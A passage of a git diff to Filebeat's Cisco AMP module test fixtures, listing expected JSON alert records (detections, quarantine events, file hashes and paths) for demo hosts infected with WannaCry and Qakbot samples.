"cisco.amp.event_type_id": 2164260893, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "53:74:31:cb:37:50" + "02:2f:e0:10:03:5d" ], - "cisco.amp.timestamp_nanoseconds": 718000000, + "cisco.amp.timestamp_nanoseconds": 729000000, "event.action": "Retrospective Quarantine Attempt Failed", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419264039066534000, + "event.id": 6412622782676337000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", "fileset.name": "amp", - "host.hostname": "Demo_WannaCry_Ransomware", - "host.name": "Demo_WannaCry_Ransomware", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 24355, + "log.offset": 29323, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "related.hosts": [ - "Demo_WannaCry_Ransomware" + "Demo_Qakbot_3" ], "related.ip": [ "8.8.8.8", @@ -649,47 +1432,49 @@ ] }, { - "@timestamp": "2021-01-14T16:55:46.000Z", + "@timestamp": "2021-01-14T16:35:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "53:74:31:cb:37:50" + "mac": "02:2f:e0:10:03:5d" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419264039066533964", - "cisco.amp.event_type_id": 553648155, + "cisco.amp.detection_id": "6412622782676336647", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "53:74:31:cb:37:50" + "02:2f:e0:10:03:5d" ], - "cisco.amp.timestamp_nanoseconds": 765000000, - "event.action": "Retrospective Quarantine", + "cisco.amp.timestamp_nanoseconds": 729000000, + "event.action": "Retrospective Quarantine Attempt Failed", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419264039066534000, + "event.id": 6412622782676337000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", "fileset.name": "amp", - "host.hostname": "Demo_WannaCry_Ransomware", - "host.name": "Demo_WannaCry_Ransomware", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 25559, + "log.offset": 30524, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "related.hosts": [ - "Demo_WannaCry_Ransomware" + "Demo_Qakbot_3" ], "related.ip": [ "8.8.8.8", @@ -713,7 +1498,7 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6412622782676336648", + "cisco.amp.detection_id": "6412622782676336646", "cisco.amp.error.description": "Object name not found", "cisco.amp.error.error_code": 3221225524, "cisco.amp.event_type_id": 2164260893, @@ -724,7 +1509,7 @@ "cisco.amp.related.mac": [ "02:2f:e0:10:03:5d" ], - "cisco.amp.timestamp_nanoseconds": 729000000, + "cisco.amp.timestamp_nanoseconds": 713000000, "event.action": "Retrospective Quarantine Attempt Failed", "event.category": [ "malware" @@ -739,7 +1524,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 29323, + "log.offset": 31725, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -768,10 +1553,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", "cisco.amp.detection_id": "6412622782676336647", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -779,9 +1563,10 @@ "cisco.amp.related.mac": [ "02:2f:e0:10:03:5d" ], - "cisco.amp.timestamp_nanoseconds": 729000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -790,11 +1575,15 @@ "event.module": "cisco", "event.severity": 3, "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "kepv86368.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe", "fileset.name": "amp", "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 30524, + "log.offset": 32926, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -823,10 +1612,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", "cisco.amp.detection_id": "6412622782676336646", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -834,9 +1622,10 @@ "cisco.amp.related.mac": [ "02:2f:e0:10:03:5d" ], - "cisco.amp.timestamp_nanoseconds": 713000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -845,11 +1634,15 @@ "event.module": "cisco", "event.severity": 3, "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "uqlq0o884.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe", "fileset.name": "amp", "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 31725, + "log.offset": 34182, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -1241,7 +2034,176 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 69603, + "log.offset": 69603, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847665", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 70815, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867977", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 639000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 72027, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831755", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 73239, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1270,10 +2232,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419229327140847665", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831754", + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1281,9 +2242,10 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 686000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -1292,11 +2254,15 @@ "event.module": "cisco", "event.severity": 3, "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 70815, + "log.offset": 74476, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1325,10 +2291,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419204897366867977", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831753", + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1336,9 +2301,10 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 639000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 873000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -1347,11 +2313,15 @@ "event.module": "cisco", "event.severity": 3, "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "qeriuwjhrf", + "file.path": "\\\\?\\C:\\Windows\\qeriuwjhrf", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 72027, + "log.offset": 75732, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1381,7 +2351,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", - "cisco.amp.detection_id": "6419247189909831755", + "cisco.amp.detection_id": "6419229327140847658", "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -1390,7 +2360,7 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 888000000, + "cisco.amp.timestamp_nanoseconds": 732000000, "event.action": "Retrospective Detection", "event.category": [ "file", @@ -1410,7 +2380,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 73239, + "log.offset": 76965, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1440,7 +2410,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", - "cisco.amp.detection_id": "6419247189909831754", + "cisco.amp.detection_id": "6419204897366867969", "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -1449,7 +2419,7 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 888000000, + "cisco.amp.timestamp_nanoseconds": 717000000, "event.action": "Retrospective Detection", "event.category": [ "file", @@ -1462,14 +2432,14 @@ "event.severity": 3, "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "file.name": "tasksche.exe", - "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 74476, + "log.offset": 78202, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1499,7 +2469,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", - "cisco.amp.detection_id": "6419247189909831753", + "cisco.amp.detection_id": "6419179204872503298", "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -1508,7 +2478,7 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 873000000, + "cisco.amp.timestamp_nanoseconds": 686000000, "event.action": "Retrospective Detection", "event.category": [ "file", @@ -1520,15 +2490,15 @@ "event.module": "cisco", "event.severity": 3, "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", - "file.name": "qeriuwjhrf", - "file.path": "\\\\?\\C:\\Windows\\qeriuwjhrf", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 75732, + "log.offset": 79439, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1558,7 +2528,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", - "cisco.amp.detection_id": "6419229327140847658", + "cisco.amp.detection_id": "6419204897366867977", "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -1567,7 +2537,7 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 732000000, + "cisco.amp.timestamp_nanoseconds": 639000000, "event.action": "Retrospective Detection", "event.category": [ "file", @@ -1580,14 +2550,14 @@ "event.severity": 3, "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "file.name": "tasksche.exe", - "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 76965, + "log.offset": 80676, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1659,6 +2629,73 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870787", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 573000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 83114, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T15:24:25.000Z", "cisco.amp.computer.active": true, @@ -1787,6 +2824,59 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412604589194870785", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 994000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 87059, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T15:18:49.000Z", "cisco.amp.computer.active": true, @@ -1842,6 +2932,75 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T15:18:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419239055241773128", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 242000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239055241773000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 89361, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T15:18:48.000Z", "cisco.amp.computer.active": true, diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json index 2dcd9193111e..a8bcab1df6e1 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json @@ -1024,6 +1024,79 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T14:41:03.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 950000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229322845880000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 21793, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T14:37:40.000Z", "cisco.amp.computer.active": true, @@ -1187,6 +1260,187 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DD6D4FEDD3-100.SBX.TG", + "cisco.amp.detection_id": "6411488666497056775", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 398000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "qYf.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe", + "fileset.name": "amp", + "host.hostname": 